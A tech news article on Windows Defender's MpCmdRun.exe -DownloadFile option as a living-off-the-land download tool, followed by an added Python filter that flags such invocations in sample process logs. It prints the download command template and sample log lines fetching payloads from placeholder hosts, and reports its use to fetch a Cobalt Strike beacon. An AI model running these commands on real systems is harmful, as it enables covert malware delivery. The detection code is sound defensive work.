Windows Defender turns into a dangerous app for admins

by Claudiu Andone, Windows & Software Expert

  • Windows Defender in Windows 10 is a great tool for defending your system, but a recent update has turned it into a potential threat.
  • A new DownloadFile command can be used to download any external file, including malware, to your computer.
Windows Defender turns into a LOLBIN

Windows Defender in Windows 10 is the first line of defence in case of malware attacks and it does a pretty good job too.

However, in one of its recent updates, the antivirus gained a new DownloadFile command that allows anyone to download any file from a URL to a path of their choosing on your computer.

This can fairly be called an exploitable feature, since it can also be used to download malware. The behaviour was discovered by security researcher Mohammad Askar, who posted his finding on Twitter.

How can Windows Defender be used to download malware?

It is trivial to use the Microsoft Antimalware Service Command Line Utility (MpCmdRun.exe) to download any file from an external source to your computer:

MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]

In his test, Askar used this command line to download a Cobalt Strike beacon, a well-known attacker tool.

The new command is included in version 4.18.2007.8-0 and later, which means attackers already have a head start.

In effect, this feature turns Windows Defender into a LOLBIN (living off the land binary): a legitimate system file that can be repurposed for malicious ends.

Fortunately, once the harmful file has been downloaded, it will still be detected by Windows Defender itself, or by another antivirus product if one is installed.

So Windows Defender has gone from being reliable protection software to one more possible threat that admins and security experts will have to monitor closely.
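One way admins can do that monitoring, as an added example that is not part of the original article: a small Python filter over process-creation events that flags any command line invoking MpCmdRun.exe with -DownloadFile and pulls out the URL and destination path. The log lines below are constructed samples in a simplified Sysmon-like "Image | CommandLine" format, not real telemetry, and the hostnames are placeholders.

```python
import re

# Constructed sample process-creation events (simplified Sysmon Event ID 1 layout), not real telemetry.
SAMPLE_EVENTS = [
    "Image: C:\\Program Files\\Windows Defender\\MpCmdRun.exe | CommandLine: MpCmdRun.exe -Scan -ScanType 1",
    "Image: C:\\Program Files\\Windows Defender\\MpCmdRun.exe | CommandLine: \"MpCmdRun.exe\" -DownloadFile "
    "-url http://example.invalid/payload.bin -path C:\\Users\\Public\\payload.bin",
    "Image: C:\\Windows\\System32\\cmd.exe | CommandLine: cmd.exe /c mpcmdrun.exe -downloadfile "
    "-url https://example.invalid/a.exe -path C:\\temp\\a.exe",
    "Image: C:\\Windows\\System32\\notepad.exe | CommandLine: notepad.exe readme.txt",
]

EVENT_RE = re.compile(r"Image:\s*(?P<image>.+?)\s*\|\s*CommandLine:\s*(?P<cmdline>.+)$")
URL_RE = re.compile(r"-url\s+(\S+)", re.IGNORECASE)
PATH_RE = re.compile(r"-path\s+(\S+)", re.IGNORECASE)


def parse_event(line):
    """Split one log line into its Image and CommandLine fields; None if malformed."""
    m = EVENT_RE.match(line)
    return {"image": m.group("image"), "cmdline": m.group("cmdline")} if m else None


def is_defender_download(event):
    # Match on the command line, not only the Image field, so a launch via
    # cmd.exe (third sample) is caught too; compare case-insensitively because
    # MpCmdRun accepts its switches in any case.
    cmd = event["cmdline"].lower()
    return "mpcmdrun" in cmd and "-downloadfile" in cmd


def find_defender_downloads(lines):
    """Return one record per MpCmdRun -DownloadFile invocation found in the lines."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev is None or not is_defender_download(ev):
            continue
        url = URL_RE.search(ev["cmdline"])
        path = PATH_RE.search(ev["cmdline"])
        hits.append({
            "image": ev["image"],
            "url": url.group(1) if url else None,
            "path": path.group(1) if path else None,
        })
    return hits


if __name__ == "__main__":
    for hit in find_defender_downloads(SAMPLE_EVENTS):
        print(f"ALERT: MpCmdRun download via {hit['image']}: {hit['url']} -> {hit['path']}")
```

In a real deployment the same predicate maps directly onto a SIEM query over Event ID 4688 or Sysmon Event ID 1 command-line fields.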
